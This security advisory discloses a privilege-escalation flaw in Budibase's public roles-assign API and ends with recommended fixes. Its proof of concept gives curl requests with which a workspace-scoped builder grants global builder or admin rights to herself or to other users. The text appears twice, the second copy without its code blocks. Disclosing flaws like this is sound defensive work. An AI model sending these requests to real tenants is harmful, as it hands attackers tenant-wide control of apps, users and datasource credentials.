Summary
/api/public/v1/roles/assign is guarded by the builderOrAdmin middleware, which passes any user who is a builder for the app id in the x-budibase-app-id header. That check admits both global builders and workspace-scoped builders (builder.apps set but builder.global unset). The controller then spreads the request body into the SDK call, and the SDK grants builder.global=true or admin.global=true on whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks the EXPANDED_PUBLIC_API feature.
Details
Controller (packages/server/src/api/controllers/public/roles.ts:13-17):
export async function assignAppBuilder(ctx: Ctx) {
const { userIds, ...assignmentProps } = ctx.request.body
await sdk.publicApi.roles.assign(userIds, assignmentProps)
ctx.body = { data: { userIds } }
}Nothing filters assignmentProps. The request body's builder and admin keys flow directly into the SDK.
SDK (packages/pro/src/sdk/publicApi/roles.ts:17-47):
export async function assign(userIds: string[], opts: AssignmentOpts) {
if (!(await isExpandedPublicApiEnabled())) {
throw new Error("Unable to assign roles - license required.")
}
const users = await userDB.bulkGet(userIds)
for (let user of users) {
// ...
if (opts.builder) {
user.builder = { global: true }
}
if (opts.admin) {
user.admin = { global: true }
}
}
await userDB.bulkUpdate(users)
}No check that the caller already holds the privilege they are granting. user.builder is overwritten unconditionally, which also strips any existing builder.apps scope from the target.
Route guard (packages/backend-core/src/middleware/builderOrAdmin.ts:6-20):
export async function builderOrAdmin(ctx: UserCtx, next: any) {
if (ctx.internal || isAdmin(ctx.user)) { return next() }
const workspaceId = await getWorkspaceIdFromCtx(ctx)
if (!workspaceId && !env.isWorker()) {
ctx.throw(403, "This request required a workspace id.")
} else if (!workspaceId && !hasBuilderPermissions(ctx.user)) {
ctx.throw(403, "Admin/Builder user only endpoint.")
} else if (workspaceId && !isBuilder(ctx.user, workspaceId)) {
ctx.throw(403, "Workspace Admin/Builder user only endpoint.")
}
// passes
}isBuilder(user, workspaceId) returns true for any user whose builder.apps array contains the workspace id, even when builder.global is unset. The endpoint therefore trusts an app-level builder with a global-scope grant.
Proof of Concept
Tested on Budibase 3.35.8 (master at f960e36). The public API license gate at roles.ts:18 was disabled in the test bundle so the underlying privilege-escalation could be reproduced end-to-end; on a licensed Enterprise tenant the gate passes and the same requests land.
Step 1: the admin creates two users. Alice is a workspace-scoped builder on an app (builder.apps: [app_...], builder.global unset, admin.global unset). Victim is a BASIC user.
Step 2: Alice calls GET /api/global/self/api_key to mint an API key tied to her identity:
curl -sS -b alice "$BASE/api/global/self/api_key"
# → {"apiKey":"80f28...","userId":"us_dab...","createdAt":"..."}Step 3: Alice calls /api/public/v1/roles/assign with the victim's id and builder: true. She scopes the request to her own app via x-budibase-app-id so builderOrAdmin passes:
curl -sS -X POST "$BASE/api/public/v1/roles/assign" \
-H "Content-Type: application/json" \
-H "x-budibase-api-key: $ALICE_APIKEY" \
-H "x-budibase-app-id: $APP_ID" \
-d '{"userIds":["us_70b6...victim"],"builder":true}'Admin verifies:
BEFORE: builder: {'global': False} admin: {'global': False}
ATTACK: HTTP 200 {"data":{"userIds":["us_70b6..."]}}
AFTER: builder: {'global': True} admin: {'global': False}
Step 4: Alice follows up with "admin": true and can target her own id:
curl -sS -X POST "$BASE/api/public/v1/roles/assign" \
-H "Content-Type: application/json" \
-H "x-budibase-api-key: $ALICE_APIKEY" \
-H "x-budibase-app-id: $APP_ID" \
-d '{"userIds":["us_dab...alice"],"admin":true}'AFTER: builder: {'apps': ['app_...']} admin: {'global': True}
Alice is now a global admin of the tenant. She kept builder.apps because the SDK only overwrites the keys it was asked to set; admin: true writes admin = { global: true } without touching builder.
Impact
Every workspace-scoped builder of any app in the tenant is one request away from global admin. Global admin grants unrestricted access to the tenant: every app in every workspace, every user, every datasource credential, every automation, every SCIM / OIDC / audit-log config. The mass-assignment also strips scoping from the target's existing role, so downgrading a legitimate global builder to an app-scoped builder fails: a later call reinstates global: true.
A tenant that shares app-building duties across teams (the common Enterprise pattern) cannot hold the per-app boundary with the current middleware. This matches GHSA-2g39-332f-68p9 (Critical Privilege Escalation & IDOR via Missing RBAC) in shape and impact.
Recommended Fix
Enforce the caller's privilege in the SDK, matching the grant they want to make:
// packages/pro/src/sdk/publicApi/roles.ts:32-43
const caller = context.getIdentity() // or however the SDK resolves the caller
if (opts.builder) {
if (!caller?.builder?.global && !caller?.admin?.global) {
throw new HTTPError("Only global builders or admins can grant global builder", 403)
}
user.builder = { global: true }
}
if (opts.admin) {
if (!caller?.admin?.global) {
throw new HTTPError("Only global admins can grant global admin", 403)
}
user.admin = { global: true }
}Alternative, equally valid: tighten builderOrAdmin so that endpoints which can set global-scope properties require isGlobalBuilder or isAdmin. That fixes this endpoint and any future endpoint that shares the middleware.
Whichever fix lands, also strip builder and admin from assignmentProps at the controller boundary (packages/server/src/api/controllers/public/roles.ts:14) unless the caller has admin.global=true. Defense-in-depth against a future SDK regression.
Found by aisafe.io
adrgs Reporter
aisafe-bot Finder
Summary
/api/public/v1/roles/assignis guarded by thebuilderOrAdminmiddleware, which passes any user who is a builder for the app id in thex-budibase-app-idheader. That check admits both global builders and workspace-scoped builders (builder.appsset butbuilder.globalunset). The controller then spreads the request body into the SDK call, and the SDK grantsbuilder.global=trueoradmin.global=trueon whichever user ids the caller supplies. Bob, a workspace-scoped builder with an API key, promotes himself or any other user to global admin with one POST. The whole flow is tenant-wide privilege escalation from an app-level role, available to anyone with an Enterprise license that unlocks theEXPANDED_PUBLIC_APIfeature.Details
Controller (
packages/server/src/api/controllers/public/roles.ts:13-17):Nothing filters
assignmentProps. The request body'sbuilderandadminkeys flow directly into the SDK.SDK (
packages/pro/src/sdk/publicApi/roles.ts:17-47):No check that the caller already holds the privilege they are granting.
user.builderis overwritten unconditionally, which also strips any existingbuilder.appsscope from the target.Route guard (
packages/backend-core/src/middleware/builderOrAdmin.ts:6-20):isBuilder(user, workspaceId)returns true for any user whosebuilder.appsarray contains the workspace id, even whenbuilder.globalis unset. The endpoint therefore trusts an app-level builder with a global-scope grant.Proof of Concept
Tested on Budibase 3.35.8 (master at f960e36). The public API license gate at
roles.ts:18was disabled in the test bundle so the underlying privilege-escalation could be reproduced end-to-end; on a licensed Enterprise tenant the gate passes and the same requests land.Step 1: the admin creates two users. Alice is a workspace-scoped builder on an app (
builder.apps: [app_...],builder.globalunset,admin.globalunset). Victim is a BASIC user.Step 2: Alice calls
GET /api/global/self/api_keyto mint an API key tied to her identity:Step 3: Alice calls
/api/public/v1/roles/assignwith the victim's id andbuilder: true. She scopes the request to her own app viax-budibase-app-idsobuilderOrAdminpasses:Admin verifies:
Step 4: Alice follows up with
"admin": trueand can target her own id:Alice is now a global admin of the tenant. She kept
builder.appsbecause the SDK only overwrites the keys it was asked to set;admin: truewritesadmin = { global: true }without touchingbuilder.Impact
Every workspace-scoped builder of any app in the tenant is one request away from global admin. Global admin grants unrestricted access to the tenant: every app in every workspace, every user, every datasource credential, every automation, every SCIM / OIDC / audit-log config. The mass-assignment also strips scoping from the target's existing role, so downgrading a legitimate global builder to an app-scoped builder fails: a later call reinstates
global: true.A tenant that shares app-building duties across teams (the common Enterprise pattern) cannot hold the per-app boundary with the current middleware. This matches GHSA-2g39-332f-68p9 (Critical Privilege Escalation & IDOR via Missing RBAC) in shape and impact.
Recommended Fix
Enforce the caller's privilege in the SDK, matching the grant they want to make:
Alternative, equally valid: tighten
builderOrAdminso that endpoints which can set global-scope properties requireisGlobalBuilderorisAdmin. That fixes this endpoint and any future endpoint that shares the middleware.Whichever fix lands, also strip
builderandadminfromassignmentPropsat the controller boundary (packages/server/src/api/controllers/public/roles.ts:14) unless the caller hasadmin.global=true. Defense-in-depth against a future SDK regression.Found by aisafe.io